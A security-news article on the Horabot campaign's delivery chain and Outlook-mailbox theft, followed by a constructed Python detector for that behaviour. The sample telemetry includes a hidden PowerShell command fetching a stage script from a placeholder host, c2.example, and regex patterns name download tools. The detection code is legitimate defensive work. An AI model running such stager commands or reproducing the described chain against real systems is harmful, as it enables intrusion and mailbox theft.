New Horabot campaign takes over victim's Gmail, Outlook accounts (Security News, June 2023)
The malware enables the operators to take control of the victim's Gmail, Outlook, Hotmail, or Yahoo email accounts, steal email data and 2FA codes arriving in the inbox, and send phishing emails from the compromised accounts.
The victim clicks the hyperlink on the page and downloads a RAR archive containing a batch file with a .CMD extension; that batch file downloads a PowerShell script, which in turn fetches trojan DLLs and a set of legitimate executables from the C2 server.
Once the credentials are compromised, the tool takes over the victim's email account, generates spam emails, and sends them to the contacts found in the victim's mailbox, furthering the infection somewhat randomly.
The primary payload dropped onto the victim's system is Horabot, a documented PowerShell-based botnet that targets the victim's Outlook mailboxes to steal contacts and disseminate phishing emails containing malicious HTML attachments.
"After initialization, the [Horabot] script looks for the Outlook data files from the victim profile's Outlook application data folder," explains Cisco in the report.
"It enumerates all folders and emails in the victim's Outlook data file and extracts email addresses from the emails' sender, recipients, CC, and BCC fields."
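As an added illustration from the defender's side (constructed example, not code from Cisco's report or from this article), the following Python scores the two behaviours the article describes: a .CMD batch file launched from a temp/extraction folder that spawns PowerShell with a download command, and PowerShell reading Outlook data files under the profile's Outlook application-data folder. The event schema, file paths, hostnames and process IDs are all assumptions chosen for the sample; real telemetry (e.g. Sysmon or EDR events) would need to be mapped onto the `Event` fields.

```python
"""
Hypothetical detection logic for the Horabot delivery chain described above.
Constructed example: the Event schema, sample paths and host names are
assumptions, not data from the report.
"""
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str          # "process" (process creation) or "file" (file read)
    pid: int
    ppid: int
    image: str         # full path of the executable
    cmdline: str = ""  # process events only
    target: str = ""   # file events only: the path that was read


# PowerShell download primitives commonly seen in stagers (assumed list).
DOWNLOAD_RE = re.compile(
    r"(Invoke-WebRequest|DownloadFile|DownloadString|\biwr\b|\bwget\b|\bcurl\b|Net\.WebClient)",
    re.I)
# A .cmd batch file being run from a Temp folder (where archives are extracted).
ARCHIVE_TMP_RE = re.compile(r"\\Temp\\.*\.cmd\b", re.I)
# Outlook data files (.pst/.ost) in the profile's Outlook application-data folder.
OUTLOOK_DATA_RE = re.compile(
    r"\\AppData\\Local\\Microsoft\\Outlook\\.*\.(pst|ost)$", re.I)
POWERSHELL_RE = re.compile(r"\\(powershell|pwsh)\.exe$", re.I)
CMD_RE = re.compile(r"\\cmd\.exe$", re.I)


def detect(events):
    """Return a list of alert strings; empty when nothing suspicious matches."""
    procs = {e.pid: e for e in events if e.kind == "process"}
    alerts = []
    for e in events:
        if e.kind == "process" and POWERSHELL_RE.search(e.image) \
                and DOWNLOAD_RE.search(e.cmdline):
            # Behaviour 1: the PowerShell downloader's parent is cmd.exe
            # running a .cmd batch file out of a Temp (extraction) folder.
            parent = procs.get(e.ppid)
            if parent and CMD_RE.search(parent.image) \
                    and ARCHIVE_TMP_RE.search(parent.cmdline):
                alerts.append(
                    f"pid {e.pid}: PowerShell download spawned by batch file "
                    f"{parent.cmdline!r}")
        elif e.kind == "file" and OUTLOOK_DATA_RE.search(e.target):
            # Behaviour 2: Outlook data files are read by PowerShell rather
            # than by Outlook itself.
            proc = procs.get(e.pid)
            if proc and POWERSHELL_RE.search(proc.image):
                alerts.append(
                    f"pid {e.pid}: PowerShell read Outlook data file {e.target}")
    return alerts


PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
OUTLOOK_IMAGE = r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"
OST_PATH = r"C:\Users\alice\AppData\Local\Microsoft\Outlook\alice@example.com.ost"

# Constructed sample telemetry: one malicious chain plus benign noise.
SAMPLE_EVENTS = [
    Event("process", 100, 1, r"C:\Windows\explorer.exe"),
    # cmd.exe running the .cmd file extracted from the RAR archive
    Event("process", 200, 100, r"C:\Windows\System32\cmd.exe",
          cmdline=r'cmd.exe /c "C:\Users\alice\AppData\Local\Temp\Rar$DIa0.123\invoice.cmd"'),
    # the batch file launches PowerShell to fetch the next stage (hostname is a placeholder)
    Event("process", 300, 200, PS_IMAGE,
          cmdline='powershell.exe -w hidden -c "Invoke-WebRequest '
                  'http://c2.example/stage.ps1 -OutFile $env:TEMP\\s.ps1"'),
    # that same PowerShell process reads the Outlook data file
    Event("file", 300, 200, PS_IMAGE, target=OST_PATH),
    # benign: Outlook itself reading its own data file
    Event("process", 400, 100, OUTLOOK_IMAGE),
    Event("file", 400, 100, OUTLOOK_IMAGE, target=OST_PATH),
    # benign: an admin running a harmless PowerShell command
    Event("process", 500, 100, PS_IMAGE, cmdline="powershell.exe -c Get-Date"),
]


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Running the script against the constructed events yields two alerts (the download chain and the Outlook data-file read), while Outlook's own access to the .ost file and the harmless PowerShell command produce none; on real data, the parent-child link and the reading process are what separate this pattern from ordinary Outlook activity.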